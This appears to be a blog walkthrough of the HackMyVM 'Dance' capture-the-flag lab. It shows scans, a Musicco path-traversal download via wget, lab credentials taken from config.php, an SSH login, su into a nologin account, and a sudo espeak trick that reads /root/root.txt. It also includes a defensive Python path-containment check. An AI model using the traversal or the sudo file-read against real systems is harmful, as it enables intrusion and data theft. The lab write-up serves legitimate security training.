Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance


Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 ...
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 ...
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Directory-scan port 80; gobuster finds /music.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]


Open /music in a browser and inspect the page; it is a web app called Musicco.



Search searchsploit for a Musicco exploit.

 ~ searchsploit musicco
 ---------------------------------------------------------------------------------------------------------
  Exploit Title                                                                                                             |  Path
 ---------------------------------------------------------------------------------------------------------
 Musicco 2.0.0 - Arbitrary Directory Download                                                                               | php/webapps/45830.txt
 ---------------------------------------------------------------------------------------------------------


Using the exploit (the getAlbum action accepts a traversing parent value), we can download the whole html directory as a zip file.

 ~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip
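The root cause above is that parent and album are joined onto the music root without checking where the result lands. A containment check that closes this class of bug, written here as an added Python example (not Musicco's code; the parameter names follow the request above, the directory tree is constructed for the demo):

```python
import os
import tempfile


def resolve_album_dir(music_root, parent, album):
    """Return the real path of parent/album under music_root, or None if it escapes.

    Hypothetical re-implementation of the getAlbum lookup: resolve symlinks and
    '..' first, then require the result to stay inside the configured root.
    """
    root = os.path.realpath(music_root)
    candidate = os.path.realpath(os.path.join(root, parent, album))
    # commonpath, not startswith: "/srv/music2" would pass a string-prefix test
    if os.path.commonpath([root, candidate]) != root:
        return None
    if not os.path.isdir(candidate):
        return None
    return candidate


def build_fixture():
    """Constructed tree: html/music/rock/album1 as a real album, and a sibling
    'var' directory standing in for what ../../ reaches in the walkthrough."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "html", "music")
    os.makedirs(os.path.join(root, "rock", "album1"))
    os.makedirs(os.path.join(base, "var"))
    return root


def demo():
    """Run one legitimate request and two escape attempts against the fixture."""
    root = build_fixture()
    return {
        "legit": resolve_album_dir(root, "rock", "album1"),
        # the exploit's parameters: parent=../../&album=var
        "traversal": resolve_album_dir(root, "../../", "var"),
        # os.path.join discards everything before an absolute component
        "absolute": resolve_album_dir(root, "rock", "/etc"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {'denied' if result is None else result}")
```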


Unzip var.zip and look at /music/config.php, which holds plaintext credentials.

 ~ cat config.php   
 <?php
 $_CONFIG['saveConfig'] = '';
 $_CONFIG['users'] = array(
         array('admin', 'admin', 'true'),
         array('guest', 'guest', 'false'),
         array('aria', 'seraphim', 'false'),
         array('alice', 'rememberyou', 'false'),
         array('ava', 'password', 'false'),
         array('alba', 'thehostof', 'false'),
 );
 $_CONFIG['lang'] = 'en';
 $_CONFIG['musicRoot'] = 'music';
 $_CONFIG['coverFileName'] = 'folder';
 $_CONFIG['coverExtension'] = '.png';
 $_CONFIG['loadLyricsFromFile'] = 'on';
 $_CONFIG['downLoadMissingCovers'] = 'on';
 $_CONFIG['searchEngine'] = '';
 $_CONFIG['imageSearchEngine'] = '';
 ?>


We can log in over SSH as user aria.

 ~ ssh aria@192.168.56.100
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


There is another user, alba, but its login shell is nologin.

 aria@dance:~$ cat /etc/passwd|grep alba
 alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin


So we pass su an explicit shell with -s and switch to alba using the password from config.php.

 aria@dance:~$ su -s /bin/bash alba
 Password:
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)


Check sudo -l.

 alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak


The last step is to use espeak to read /root/root.txt: -f takes the text from the file, -q suppresses the audio, and -X prints a trace of the translated text to stdout.

 alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt  -q -X
 Translate 'rootflag'
 ...
